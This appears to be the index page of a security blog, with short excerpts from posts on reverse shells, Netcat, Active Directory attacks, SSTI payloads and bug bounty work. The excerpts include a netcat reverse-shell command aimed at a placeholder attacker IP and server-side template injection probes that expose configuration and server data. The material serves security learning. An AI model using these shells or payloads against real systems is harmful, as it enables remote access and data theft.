RatSec Blog


Topics that don't need a category, or don't fit into any other existing category.

Reverse Shell Methods

- Posted in Uncategorized by

Using Netcat Netcat Simple Shell: On the attacker's machine: nc -lvp 4444 On the target machine: nc <attacker_IP> 4444 -e /bin/bash Netcat with mkfifo: On the attacker's machine: nc -lvp 4444

Linux File Permissions

- Posted in Uncategorized by

In Linux, each file and directory has an associated set of permissions and ownership attributes that determine who can access and manipulate the files and directories. These permissions are defined

Netcat Cheat Sheet

- Posted in Uncategorized by

1. Listening Mode: nc -l -p <port> Start Netcat in listening mode on a specific port. This mode waits for incoming connections. Connect Mode: nc <host> <port> Connect to a specific
Vulnerability Scanning Packet Sniffing Man-in-the-Middle Attacks (MitM) DNS Spoofing ARP Spoofing SSL/TLS Hijacking Session Hijacking IP Spoofing MAC Address Spoofing SMTP Relay Exploits Firewall

osi attacks

- Posted in Uncategorized by

Application Layer Functions Attack Vectors User interface & applevel service malware injection Web browsing, email, file transfer Phishing attacks HTTP, SMTP, DNS protocols App-level DDoS attacks

Active Directory Attacks

- Posted in Uncategorized by

Active Directory attacks: Pass-the-Hash (PtH) Attack: Involves stealing hashed credentials from one system and using them to authenticate to another system. Pass-the-Ticket (PtT) Attack: Similar to
In today's digital age, our lives are increasingly intertwined with the online world. From banking to social media and everything in between, we rely on the internet for countless tasks. However,

SSTI Payloads

- Posted in Uncategorized by

${{<%[%'"}}%. ${{7*7}} ${{3*'3'}} <%= 3 * 3 %> ${6*6} {{dump(app)}} {{app.request.server.all|join(',')}} {{config.items()}} {{ [].class.base.subclasses()
Here are 25 ways to make money with your skills in ethical hacking: Bug Bounty Hunter: Bug bounty hunters find and report vulnerabilities in software and websites for a bounty. This can be a great

Bug Bounty Cheat Sheet

- Posted in Uncategorized by

Information Gathering - Identify target IP addresses and domains. - Perform DNS enumeration. - Identify technologies used by the target (e.g., Wappalyzer). - Identify people related to the target